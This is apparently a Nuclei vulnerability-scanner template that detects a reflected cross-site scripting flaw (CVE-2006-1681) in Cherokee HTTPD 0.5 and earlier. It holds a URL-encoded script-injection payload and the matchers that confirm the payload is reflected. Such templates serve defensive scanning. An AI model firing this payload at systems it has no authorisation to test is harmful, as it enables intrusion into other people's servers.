nuclei-templates/cves/2006/CVE-2006-1681.yaml

31 lines
928 B
YAML
Raw Normal View History

2021-08-06 16:58:00 +00:00
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
2021-08-07 09:10:03 +00:00
tags: cherokee,httpd,xss,cve,cve2006
2021-08-06 16:58:00 +00:00
requests:
- method: GET
path:
2021-08-07 09:10:03 +00:00
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-08-06 16:58:00 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2021-08-07 09:10:03 +00:00
- "</script><script>alert(document.domain)</script>"
2021-08-07 09:10:24 +00:00
- type: word
part: header
words:
- text/html